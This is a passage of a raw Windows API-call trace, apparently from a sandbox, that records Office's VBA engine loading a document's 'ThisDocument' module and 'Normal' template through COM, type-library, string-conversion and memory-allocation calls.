ppvObject=0x1871a8*=0x0) returned 0x80004002 [0041.258] IUnknown:Release (This=0x6992850) returned 0x4 [0041.258] IUnknown:AddRef (This=0x6992df0) returned 0x5 [0041.258] IUnknown:QueryInterface (in: This=0x6992df0, riid=0x7fee45d5c68*(Data1=0xcacc1e84, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1871a8 | out: ppvObject=0x1871a8*=0x0) returned 0x80004002 [0041.258] IUnknown:Release (This=0x6992df0) returned 0x4 [0041.258] wcsncpy_s (in: _Destination=0x186e70, _SizeInWords=0x108, _Source="*\\Z045de83298", _MaxCount=0x106 | out: _Destination="*\\Z045de83298") returned 0x0 [0041.258] CharLowerBuffW (in: lpsz="*\\Z045de83298", cchLength=0xd | out: lpsz="*\\z045de83298") returned 0xd [0041.258] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="*\\z045de83298", cchWideChar=14, lpMultiByteStr=0x186da0, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="*\\z045de83298", lpUsedDefaultChar=0x0) returned 14 [0041.258] _wcsicmp (_String1="*\\Z045de83298", _String2="*\\Z045de83298") returned 0 [0041.258] wcsncpy_s (in: _Destination=0x186e70, _SizeInWords=0x108, _Source="*\\CNormal", _MaxCount=0x106 | out: _Destination="*\\CNormal") returned 0x0 [0041.258] CharLowerBuffW (in: lpsz="*\\CNormal", cchLength=0x9 | out: lpsz="*\\cnormal") returned 0x9 [0041.258] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="*\\cnormal", cchWideChar=10, lpMultiByteStr=0x186da0, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="*\\cnormal", lpUsedDefaultChar=0x0) returned 10 [0041.258] _wcsicmp (_String1="*\\CNormal", _String2="*\\CNormal") returned 0 [0041.260] wcscpy_s (in: _Destination=0x6bd37d8, _SizeInWords=0xa, _Source="*\\CNormal" | out: _Destination="*\\CNormal") returned 0x0 [0041.260] wcsncpy_s (in: _Destination=0x186e70, _SizeInWords=0x108, _Source="*\\Z045de83298", _MaxCount=0x106 | out: _Destination="*\\Z045de83298") returned 0x0 [0041.260] CharLowerBuffW (in: lpsz="*\\Z045de83298", cchLength=0xd | out: lpsz="*\\z045de83298") returned 0xd [0041.260] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="*\\z045de83298", cchWideChar=14, lpMultiByteStr=0x186da0, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="*\\z045de83298", lpUsedDefaultChar=0x0) returned 14 [0041.260] _wcsicmp (_String1="*\\Z045de83298", _String2="*\\Z045de83298") returned 0 [0041.260] wcsncpy_s (in: _Destination=0x186eb0, _SizeInWords=0x108, _Source="*\\CNormal", _MaxCount=0x106 | out: _Destination="*\\CNormal") returned 0x0 [0041.260] CharLowerBuffW (in: lpsz="*\\CNormal", cchLength=0x9 | out: lpsz="*\\cnormal") returned 0x9 [0041.260] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="*\\cnormal", cchWideChar=10, lpMultiByteStr=0x186de0, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="*\\cnormal", lpUsedDefaultChar=0x0) returned 10 [0041.260] wcscpy_s (in: _Destination=0x6c249a0, _SizeInWords=0x108, _Source="*\\CNormal" | out: _Destination="*\\CNormal") returned 0x0 [0041.260] _wfullpath (in: _Buffer=0x1876c0, _Path="Normal", _BufferCount=0x104 | out: _Buffer="C:\\Users\\aETAdzjz\\Desktop\\Normal") returned="C:\\Users\\aETAdzjz\\Desktop\\Normal" [0041.260] lstrcmpiW (lpString1="C:\\Users\\aETAdzjz\\Desktop\\Normal", lpString2="") returned 1 [0041.260] SysStringByteLen (bstr="潎浲污") returned 0x6 [0041.260] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x68f12f8, cbMultiByte=6, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 6 [0041.260] SysStringByteLen (bstr="潎浲污") returned 0x6 [0041.260] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x68f12f8, cbMultiByte=7, lpWideCharStr=0x68e9708, cchWideChar=7 | out: lpWideCharStr="Normal") returned 7 [0041.260] lstrlenA (lpString="Normal") returned 6 [0041.260] ITypeInfo:RemoteGetDocumentation (in: This=0x6a86060, memid=-1, refPtrFlags=0x187a58, pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x2747f48 | out: pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x2747f48*="\x91e4\xe445\x7fe") returned 0x0 [0041.260] IUnknown:Release (This=0x6a86060) returned 0x0 [0041.260] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Document", cchWideChar=-1, lpMultiByteStr=0x187a30, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Document", lpUsedDefaultChar=0x0) returned 9 [0041.260] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ThisDocument", cchWideChar=-1, lpMultiByteStr=0x187a10, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ThisDocument", lpUsedDefaultChar=0x0) returned 13 [0041.260] IsCharAlphaA (ch=84) returned 1 [0041.261] lstrlenA (lpString="ThisDocument") returned 12 [0041.261] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x187a70, cbMultiByte=-1, lpWideCharStr=0x2747f10, cchWideChar=13 | out: lpWideCharStr="ThisDocument") returned 13 [0041.261] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ThisDocument", cchWideChar=13, lpMultiByteStr=0x1878b0, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ThisDocument", lpUsedDefaultChar=0x0) returned 13 [0041.261] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ThisDocument") returned 0x109e3c [0041.261] lstrlenA (lpString="ThisDocument") returned 12 [0041.261] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x187a70, cbMultiByte=-1, lpWideCharStr=0x2747f10, cchWideChar=13 | out: lpWideCharStr="ThisDocument") returned 13 [0041.261] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ThisDocument", cchWideChar=13, lpMultiByteStr=0x187870, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ThisDocument", lpUsedDefaultChar=0x0) returned 13 [0041.261] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ThisDocument") returned 0x109e3c [0041.261] lstrlenA (lpString="ThisDocument") returned 12 [0041.261] ITypeInfo:RemoteGetTypeAttr (in: This=0x6a85f00, ppTypeAttr=0x187860, pDummy=0x0 | out: ppTypeAttr=0x187860, pDummy=0x0) returned 0x0 [0041.261] ITypeInfo:LocalReleaseTypeAttr (This=0x6a85f00) returned 0x0 [0041.261] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x187a70, cbMultiByte=-1, lpWideCharStr=0x1878d0, cchWideChar=13 | out: lpWideCharStr="ThisDocument") returned 13 [0041.261] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ThisDocument", cchWideChar=13, lpMultiByteStr=0x1874f0, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ThisDocument", lpUsedDefaultChar=0x0) returned 13 [0041.261] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ThisDocument") returned 0x109e3c [0041.261] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ThisDocument", cchWideChar=13, lpMultiByteStr=0x187630, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ThisDocument", lpUsedDefaultChar=0x0) returned 13 [0041.262] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ThisDocument") returned 0x109e3c [0041.262] IMalloc:Realloc (This=0x7feffc15380, pv=0x6c14010, cb=0x8) returned 0x6c14130 [0041.262] IMalloc:Alloc (This=0x7feffc15380, cb=0x80) returned 0x6b9f700 [0041.262] IMalloc:GetSize (This=0x7feffc15380, pv=0x6b9f700) returned 0x80 [0041.262] IMalloc:Alloc (This=0x7feffc15380, cb=0xb8) returned 0x6b0dca0 [0041.262] IMalloc:Alloc (This=0x7feffc15380, cb=0xb8) returned 0x6b0dbe0 [0041.262] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ThisDocument", cchWideChar=13, lpMultiByteStr=0x1874f0, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ThisDocument", lpUsedDefaultChar=0x0) returned 13 [0041.262] CoCreateGuid (in: pguid=0x187220 | out: pguid=0x187220*(Data1=0x909665d8, Data2=0x7e0c, Data3=0x4b43, Data4=([0]=0xab, [1]=0x42, [2]=0x8d, [3]=0xca, [4]=0x51, [5]=0x1, [6]=0x7f, [7]=0xb9))) returned 0x0 [0041.262] CoCreateGuid (in: pguid=0x187230 | out: pguid=0x187230*(Data1=0xd06ac39e, Data2=0x2501, Data3=0x4c20, Data4=([0]=0x91, [1]=0x83, [2]=0xd5, [3]=0x16, [4]=0x0, [5]=0x7a, [6]=0x54, [7]=0xee))) returned 0x0 [0041.262] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="ThisDocument", cchWideChar=13, lpMultiByteStr=0x187240, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ThisDocument", lpUsedDefaultChar=0x0) returned 13 [0041.262] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ThisDocument") returned 0x109e3c [0041.262] GetLocalTime (in: lpSystemTime=0x187118 | out: lpSystemTime=0x187118*(wYear=0x7e2, wMonth=0xc, wDayOfWeek=0x4, wDay=0x6, wHour=0x16, wMinute=0x1a, wSecond=0x20, wMilliseconds=0x2f8)) [0041.262] _ultow_s (in: _Value=0x5de83298, _Buffer=0x6c8b964, _BufferCount=0x9, _Radix=16 | out: _Buffer="5de83298") returned 0x0 [0041.262] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="055de83298", cchWideChar=11, lpMultiByteStr=0x1870b0, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="055de83298", lpUsedDefaultChar=0x0) returned 11 [0041.262] IMalloc:Alloc (This=0x7feffc15380, cb=0x170) returned 0x6c96230 [0041.262] IMalloc:Alloc (This=0x7feffc15380, cb=0x50) returned 0x6a67560 [0041.262] strcpy_s (in: _Dst=0x6a7e260, _DstSize=0xd, _Src="ThisDocument" | out: _Dst="ThisDocument") returned 0x0 [0041.262] IMalloc:Realloc (This=0x7feffc15380, pv=0x6c13fd0, cb=0x68) returned 0x6c69ee0 [0041.262] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ThisDocument") returned 0x109e3c [0041.262] wcscpy_s (in: _Destination=0x6c8b978, _SizeInWords=0xd, _Source="ThisDocument" | out: _Destination="ThisDocument") returned 0x0 [0041.262] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ThisDocument") returned 0x109e3c [0041.262] wcscpy_s (in: _Destination=0x6c8b998, _SizeInWords=0xd, _Source="ThisDocument" | out: _Destination="ThisDocument") returned 0x0 [0041.262] IMalloc:Realloc (This=0x7feffc15380, pv=0x6c13ff0, cb=0x12) returned 0x6c32550 [0041.262] IMalloc:Realloc (This=0x7feffc15380, pv=0x6c13fe0, cb=0x6) returned 0x6c13ff0 [0041.262] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ThisDocument") returned 0x109e3c [0041.262] IMalloc:Alloc (This=0x7feffc15380, cb=0x30) returned 0x6889530 [0041.262] IMalloc:Free (This=0x7feffc15380, pv=0x6a67500) [0041.262] IMalloc:Alloc (This=0x7feffc15380, cb=0x20) returned 0x68e94c0 [0041.262] IMalloc:Realloc (This=0x7feffc15380, pv=0x68e94c0, cb=0x5c) returned 0x6c69f50 [0041.262] IMalloc:Free (This=0x7feffc15380, pv=0x6889530) [0041.262] IMalloc:Alloc (This=0x7feffc15380, cb=0x3d0) returned 0x6c98200 [0041.262] IMalloc:Alloc (This=0x7feffc15380, cb=0x20) returned 0x68e94c0 [0041.262] IMalloc:Alloc (This=0x7feffc15380, cb=0x10) returned 0x6c322d0 [0041.262] IMalloc:Alloc (This=0x7feffc15380, cb=0x80) returned 0x6b9f790 [0041.262] IMalloc:Alloc (This=0x7feffc15380, cb=0x0) returned 0x6c13fe0 [0041.262] IMalloc:Alloc (This=0x7feffc15380, cb=0x0) returned 0x6c13fd0 [0041.263] wcsncpy_s (in: _Destination=0x186f70, _SizeInWords=0x108, _Source="*\\CNormal", _MaxCount=0x106 | out: _Destination="*\\CNormal") returned 0x0 [0041.263] CharLowerBuffW (in: lpsz="*\\CNormal", cchLength=0x9 | out: lpsz="*\\cnormal") returned 0x9 [0041.263] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="*\\cnormal", cchWideChar=10, lpMultiByteStr=0x186ea0, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="*\\cnormal", lpUsedDefaultChar=0x0) returned 10 [0041.263] _wcsicmp (_String1="*\\CNormal", _String2="*\\CNormal") returned 0 [0041.263] IMalloc:Alloc (This=0x7feffc15380, cb=0x688) returned 0x6c8bc70 [0041.263] IMalloc:Alloc (This=0x7feffc15380, cb=0x80) returned 0x6b9f820 [0041.263] IMalloc:Alloc (This=0x7feffc15380, cb=0x640) returned 0x69d77a0 [0041.263] IMalloc:Alloc (This=0x7feffc15380, cb=0x20) returned 0x68e9ac0 [0041.263] IMalloc:Alloc (This=0x7feffc15380, cb=0x0) returned 0x6c14010 [0041.263] IMalloc:Alloc (This=0x7feffc15380, cb=0x0) returned 0x6c14140 [0041.263] IMalloc:Alloc (This=0x7feffc15380, cb=0x20) returned 0x68e9580 [0041.263] IMalloc:Alloc (This=0x7feffc15380, cb=0x80) returned 0x6b9f8b0 [0041.263] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_Evaluate") returned 0x10d918 [0041.263] strcpy_s (in: _Dst=0x187140, _DstSize=0xa, _Src="_Evaluate" | out: _Dst="_Evaluate") returned 0x0 [0041.263] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x187140, cbMultiByte=10, lpWideCharStr=0x186f90, cchWideChar=10 | out: lpWideCharStr="_Evaluate") returned 10 [0041.263] IUnknown:AddRef (This=0x6990960) returned 0x4 [0041.263] ITypeLib:RemoteIsName (in: This=0x6990960, szNameBuf="_Evaluate", lHashVal=0x10d918, pfName=0x187060, pBstrLibName=0x186f90 | out: pfName=0x187060*=0, pBstrLibName=0x186f90) returned 0x0 [0041.263] IUnknown:Release (This=0x6990960) returned 0x3 [0041.263] IUnknown:AddRef (This=0x6992850) returned 0x6 [0041.263] ITypeLib:RemoteIsName (in: This=0x6992850, szNameBuf="_Evaluate", lHashVal=0x10d918, pfName=0x187060, pBstrLibName=0x186f90 | out: pfName=0x187060*=0, pBstrLibName=0x186f90) returned 0x0 [0041.263] IUnknown:Release (This=0x6992850) returned 0x5 [0041.263] IUnknown:AddRef (This=0x6992df0) returned 0x5 [0041.263] ITypeLib:RemoteIsName (in: This=0x6992df0, szNameBuf="_Evaluate", lHashVal=0x10d918, pfName=0x187060, pBstrLibName=0x186f90 | out: pfName=0x187060*=0, pBstrLibName=0x186f90) returned 0x0 [0041.263] IUnknown:Release (This=0x6992df0) returned 0x4 [0041.263] IUnknown:QueryInterface (in: This=0x6a86060, riid=0x7fee45d5af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1876a8 | out: ppvObject=0x1876a8*=0x0) returned 0x80004002 [0041.263] IUnknown:QueryInterface (in: This=0x6a86060, riid=0x7fee45d5af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x187658 | out: ppvObject=0x187658*=0x0) returned 0x80004002 [0041.263] ITypeInfo:RemoteGetTypeAttr (in: This=0x6a86060, ppTypeAttr=0x187638, pDummy=0x10 | out: ppTypeAttr=0x187638, pDummy=0x10) returned 0x0 [0041.263] ITypeInfo:LocalReleaseTypeAttr (This=0x6a86060) returned 0x0 [0041.263] ITypeInfo:GetImplTypeFlags (in: This=0x6a86060, index=0x0, pImplTypeFlags=0x187654 | out: pImplTypeFlags=0x187654*=1) returned 0x0 [0041.263] ITypeInfo:GetRefTypeOfImplType (in: This=0x6a86060, index=0x0, pRefType=0x187630 | out: pRefType=0x187630*=0x6300) returned 0x0 [0041.263] ITypeInfo:GetRefTypeInfo (in: This=0x6a86060, hreftype=0x6300, ppTInfo=0x187628 | out: ppTInfo=0x187628*=0x6a860b8) returned 0x0 [0041.264] ITypeInfo:RemoteGetTypeAttr (in: This=0x6a860b8, ppTypeAttr=0x187638, pDummy=0x187610 | out: ppTypeAttr=0x187638, pDummy=0x187610*=0x187660) returned 0x0 [0041.264] ITypeInfo:LocalReleaseTypeAttr (This=0x6a860b8) returned 0x0 [0041.264] ITypeInfo:GetRefTypeOfImplType (in: This=0x6a860b8, index=0xffffffff, pRefType=0x187630 | out: pRefType=0x187630*=0xfffffffe) returned 0x0 [0041.264] ITypeInfo:GetRefTypeInfo (in: This=0x6a860b8, hreftype=0xfffffffe, ppTInfo=0x1876a0 | out: ppTInfo=0x1876a0*=0x6a86110) returned 0x0 [0041.264] IUnknown:Release (This=0x6a860b8) returned 0x1 [0041.264] ITypeInfo:RemoteGetTypeAttr (in: This=0x6a86060, ppTypeAttr=0x187658, pDummy=0x3 | out: ppTypeAttr=0x187658, pDummy=0x3) returned 0x0 [0041.264] ITypeInfo:LocalReleaseTypeAttr (This=0x6a86060) returned 0x0 [0041.264] ITypeInfo:GetImplTypeFlags (in: This=0x6a86060, index=0x0, pImplTypeFlags=0x18764c | out: pImplTypeFlags=0x18764c*=1) returned 0x0 [0041.264] ITypeInfo:GetImplTypeFlags (in: This=0x6a86060, index=0x1, pImplTypeFlags=0x18764c | out: pImplTypeFlags=0x18764c*=2) returned 0x0 [0041.264] ITypeInfo:GetImplTypeFlags (in: This=0x6a86060, index=0x2, pImplTypeFlags=0x18764c | out: pImplTypeFlags=0x18764c*=3) returned 0x0 [0041.264] ITypeInfo:GetRefTypeOfImplType (in: This=0x6a86060, index=0x2, pRefType=0x187650 | out: pRefType=0x187650*=0x10700) returned 0x0 [0041.264] ITypeInfo:GetRefTypeInfo (in: This=0x6a86060, hreftype=0x10700, ppTInfo=0x1876b0 | out: ppTInfo=0x1876b0*=0x6a861c0) returned 0x0 [0041.264] IUnknown:QueryInterface (in: This=0x6a86110, riid=0x7fee45de860*(Data1=0xb196b284, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x187650 | out: ppvObject=0x187650*=0x6c32590) returned 0x0 [0041.264] IConnectionPointContainer:FindConnectionPoint (in: This=0x6c32590, riid=0x7fee45e0ba8*(Data1=0x20410, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppCP=0x187648 | out: ppCP=0x187648*=0x6a67500) returned 0x0 [0041.265] IMalloc:Alloc (This=0x7feffc15380, cb=0x20) returned 0x68e95e0 [0041.265] IConnectionPoint:Advise (in: This=0x6a67500, pUnkSink=0x68e95e0, pdwCookie=0x187644 | out: pdwCookie=0x187644*=0x4) returned 0x0 [0041.265] IMalloc:Alloc (This=0x7feffc15380, cb=0x20) returned 0x68e9730 [0041.265] IMalloc:Realloc (This=0x7feffc15380, pv=0x6c13fe0, cb=0x20) returned 0x68f4f20 [0041.265] IMalloc:Realloc (This=0x7feffc15380, pv=0x6c14010, cb=0x28) returned 0x68e94f0 [0041.265] IUnknown:QueryInterface (in: This=0x6a86110, riid=0x7fee45d5af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x187460 | out: ppvObject=0x187460*=0x0) returned 0x80004002 [0041.265] IUnknown:QueryInterface (in: This=0x6a86110, riid=0x7fee45d5af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x187430 | out: ppvObject=0x187430*=0x0) returned 0x80004002 [0041.265] IUnknown:QueryInterface (in: This=0x6a86110, riid=0x7fee45e0b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x187420 | out: ppvObject=0x187420*=0x0) returned 0x80004002 [0041.265] IUnknown:QueryInterface (in: This=0x6a86110, riid=0x7fee45e0b88*(Data1=0xcacc1e88, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x187428 | out: ppvObject=0x187428*=0x0) returned 0x80004002 [0041.265] ITypeInfo:RemoteGetTypeAttr (in: This=0x6a86110, ppTypeAttr=0x187458, pDummy=0x10 | out: ppTypeAttr=0x187458, pDummy=0x10) returned 0x0 [0041.265] ITypeInfo:LocalReleaseTypeAttr (This=0x6a86110) returned 0x0 [0041.265] IUnknown:AddRef (This=0x6a86110) returned 0x2 [0041.265] IUnknown:QueryInterface (in: This=0x6a861c0, riid=0x7fee45d5af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x187470 | out: ppvObject=0x187470*=0x0) returned 0x80004002 [0041.265] IUnknown:QueryInterface (in: This=0x6a861c0, riid=0x7fee45d5af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x187440 | out: ppvObject=0x187440*=0x0) returned 0x80004002 [0041.265] IUnknown:QueryInterface (in: This=0x6a861c0, riid=0x7fee45e0b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x187430 | out: ppvObject=0x187430*=0x0) returned 0x80004002 [0041.265] IUnknown:QueryInterface (in: This=0x6a861c0, riid=0x7fee45e0b88*(Data1=0xcacc1e88, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x187438 | out: ppvObject=0x187438*=0x0) returned 0x80004002 [0041.265] ITypeInfo:RemoteGetTypeAttr (in: This=0x6a861c0, ppTypeAttr=0x187468, pDummy=0x10 | out: ppTypeAttr=0x187468, pDummy=0x10) returned 0x0 [0041.265] ITypeInfo:LocalReleaseTypeAttr (This=0x6a861c0) returned 0x0 [0041.265] IUnknown:AddRef (This=0x6a861c0) returned 0x2 [0041.265] IUnknown:QueryInterface (in: This=0x6a86060, riid=0x7fee45d5af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1874b0 | out: ppvObject=0x1874b0*=0x0) returned 0x80004002 [0041.265] IUnknown:QueryInterface (in: This=0x6a86060, riid=0x7fee45d5af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x187480 | out: ppvObject=0x187480*=0x0) returned 0x80004002 [0041.265] IUnknown:QueryInterface (in: This=0x6a86060, riid=0x7fee45e0b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x187470 | out: ppvObject=0x187470*=0x0) returned 0x80004002 [0041.265] IUnknown:QueryInterface (in: This=0x6a86060, riid=0x7fee45e0b88*(Data1=0xcacc1e88, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x187478 | out: ppvObject=0x187478*=0x0) returned 0x80004002 [0041.265] ITypeInfo:RemoteGetTypeAttr (in: This=0x6a86060, ppTypeAttr=0x1874a8, pDummy=0x10 | out: ppTypeAttr=0x1874a8, pDummy=0x10) returned 0x0 [0041.265] ITypeInfo:LocalReleaseTypeAttr (This=0x6a86060) returned 0x0 [0041.265] IUnknown:AddRef (This=0x6a86060) returned 0x2 [0041.265] IUnknown:Release (This=0x6a86110) returned 0x1 [0041.265] IUnknown:Release (This=0x6a861c0) returned 0x1 [0041.266] wcsncpy_s (in: _Destination=0x1871b0, _SizeInWords=0x108, _Source="*\\CNormal", _MaxCount=0x106 | out: _Destination="*\\CNormal") returned 0x0 [0041.266] CharLowerBuffW (in: lpsz="*\\CNormal", cchLength=0x9 | out: lpsz="*\\cnormal") returned 0x9 [0041.266] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="*\\cnormal", cchWideChar=10, lpMultiByteStr=0x1870e0, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="*\\cnormal", lpUsedDefaultChar=0x0) returned 10 [0041.266] _wcsicmp (_String1="*\\CNormal", _String2="*\\CNormal") returned 0 [0041.266] IUnknown:Release (This=0x6a86060) returned 0x1 [0041.266] CExposedDocFile::CreateStream () returned 0x0 [0041.266] IMalloc:Alloc (This=0x7feffc15380, cb=0x420) returned 0x6c985e0 [0041.266] CExposedStream::AddRef () returned 0x2 [0041.266] CExposedStream::Release () returned 0x1 [0041.266] CExposedStream::Release () returned 0x0 [0041.266] IMalloc:Free (This=0x7feffc15380, pv=0x6c985e0) [0041.266] CExposedDocFile::AddRef () returned 0x3 [0041.266] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x187a70, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 13 [0041.266] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x187a70, cbMultiByte=-1, lpWideCharStr=0x3faf748, cchWideChar=13 | out: lpWideCharStr="ThisDocument") returned 13 [0041.269] LoadTypeLib (in: szFile="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE16\\MSO.DLL", pptlib=0x187b18*=0x0 | out: pptlib=0x187b18*=0x6992580) returned 0x0 [0041.269] LoadTypeLib (in: szFile="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE16\\MSO.DLL", pptlib=0x1877a8*=0x0 | out: pptlib=0x1877a8*=0x6992580) returned 0x0 [0041.269] ITypeLib:RemoteGetDocumentation (in: This=0x6992580, index=-1, refPtrFlags=0x1877c8, pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x0 | out: pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x0) returned 0x0 [0041.269] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Office", cchWideChar=7, lpMultiByteStr=0x1876b0, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Office", lpUsedDefaultChar=0x0) returned 7 [0041.269] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Office") returned 0x107515 [0041.269] IUnknown:QueryInterface (in: This=0x6992580, riid=0x7fee45d5c68*(Data1=0xcacc1e84, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), 